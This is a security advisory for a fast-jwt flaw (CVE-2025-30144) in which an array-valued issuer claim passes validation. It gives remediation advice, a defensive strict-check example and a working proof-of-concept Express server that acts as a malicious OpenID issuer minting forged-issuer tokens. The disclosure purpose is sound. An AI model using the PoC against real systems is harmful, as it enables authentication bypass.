Acceptance of Extraneous Untrusted Data With Trusted Data Affecting fast-jwt package, versions <5.0.6


Severity: medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.64% (69th percentile)

  • Snyk ID: SNYK-JS-FASTJWT-9486049
  • Published: 20 Mar 2025
  • Disclosed: 19 Mar 2025
  • Credit: Tiberiu Baron

Introduced: 19 Mar 2025

CVE-2025-30144
CWE-349

How to fix?

Upgrade fast-jwt to version 5.0.6 or higher.

Overview

fast-jwt is a fast JSON Web Token implementation.

Affected versions of this package are vulnerable to Acceptance of Extraneous Untrusted Data With Trusted Data when validating the issuer (iss) claim in validateClaimValues(). The function implicitly accepts an array of issuer URLs and treats the claim as valid if any one member matches an allowed issuer. This behavior is not compliant with RFC 7519, which specifies that the iss claim is a single string (StringOrURI). An attacker can bypass the intended verification by sending a JWT whose iss claim is an array containing a malicious domain alongside a legitimate one.
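The following is an added example, not fast-jwt's own code. It reduces the issuer check described above to a few lines so the loose (vulnerable) and strict (RFC 7519-conformant) behaviours can be compared side by side, and adds a pre-verification guard that rejects any compact JWT whose iss claim is present but not a string, which is a reasonable stopgap for deployments that cannot upgrade immediately. All function names, the allowed-issuer list and the sample payloads are constructed for this example; it assumes Node.js with Buffer support for the 'base64url' encoding.

```javascript
// Constructed allow-list; real deployments take this from configuration.
const ALLOWED_ISSUERS = ['https://valid-iss'];

// Mirrors the vulnerable behaviour: an array `iss` passes when any member
// is an allowed issuer.
function issuerAcceptedLoose(payload, allowed = ALLOWED_ISSUERS) {
  const values = Array.isArray(payload.iss) ? payload.iss : [payload.iss];
  return values.some((v) => allowed.includes(v));
}

// RFC 7519: `iss` is a StringOrURI, i.e. a single string. Any other type
// (array, object, number) is rejected before the value is compared.
function issuerAcceptedStrict(payload, allowed = ALLOWED_ISSUERS) {
  return typeof payload.iss === 'string' && allowed.includes(payload.iss);
}

// Decode the payload segment of a compact JWT without verifying it. This is
// a type check on claims only; signature verification stays with the library.
function decodePayload(token) {
  const parts = token.split('.');
  if (parts.length !== 3) throw new Error('not a compact JWS');
  return JSON.parse(Buffer.from(parts[1], 'base64url').toString('utf8'));
}

// Guard for deployments that cannot upgrade yet: reject a token whose `iss`
// (or any other listed StringOrURI claim) is present but not a string.
function hasStringClaims(token, claims = ['iss', 'sub', 'jti']) {
  const payload = decodePayload(token);
  return claims.every((c) => payload[c] === undefined || typeof payload[c] === 'string');
}

// Constructed sample tokens: header and payload are base64url encoded and the
// signature segment is a placeholder, since only claim types are inspected here.
function makeUnsignedToken(payload) {
  const b64 = (o) => Buffer.from(JSON.stringify(o)).toString('base64url');
  return `${b64({ alg: 'RS256', typ: 'JWT' })}.${b64(payload)}.sig`;
}

// Constructed payloads: a legitimate one, and one shaped like the PoC below,
// with an array `iss` mixing an attacker-controlled URL and the real issuer.
const legitPayload = { sub: 'alice', iss: 'https://valid-iss' };
const craftedPayload = {
  sub: 'alice',
  iss: ['http://localhost:3001/', 'https://valid-iss'],
};

// The loose check accepts both payloads; the strict check and the guard
// accept only the legitimate one.
```

Run the guard before calling the library's verifier so a non-string iss never reaches the comparison; it does not replace upgrading to 5.0.6 or later.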

PoC

// Attacker-controlled server that plays the role of an OpenID Connect issuer:
// it publishes a discovery document and a JWKS, and mints RS256 tokens whose
// `iss` claim is an array containing this server's URL alongside a legitimate
// issuer. A vulnerable fast-jwt verifier accepts the token because one array
// member matches.
const { generateKeyPairSync } = require('crypto');
const express = require('express');
const pem2jwk = require('pem2jwk');
const jwt = require('jsonwebtoken');

const app = express();
const port = 3001;
const host = `http://localhost:${port}/`;

// RSA key pair used to sign tokens; the public half is exposed via JWKS.
const { publicKey, privateKey } = generateKeyPairSync('rsa', {
  modulusLength: 4096,
  publicKeyEncoding: { type: 'pkcs1', format: 'pem' },
  privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
});
const jwk = pem2jwk(publicKey);

app.use(express.json());

// Endpoint to create a token whose `iss` claim is an array
app.post('/create-token', (req, res) => {
  const token = jwt.sign(
    { ...req.body, iss: [host, 'https://valid-iss'] },
    privateKey,
    { algorithm: 'RS256' },
  );
  res.send(token);
});

// JWKS endpoint serving the public key
app.get('/.well-known/jwks.json', (req, res) => {
  return res.json({
    keys: [{ ...jwk, alg: 'RS256', use: 'sig' }],
  });
});

// Any other path returns a minimal discovery document pointing at this server
app.all('*', (req, res) => {
  return res.json({
    issuer: host,
    jwks_uri: host + '.well-known/jwks.json',
  });
});

app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});
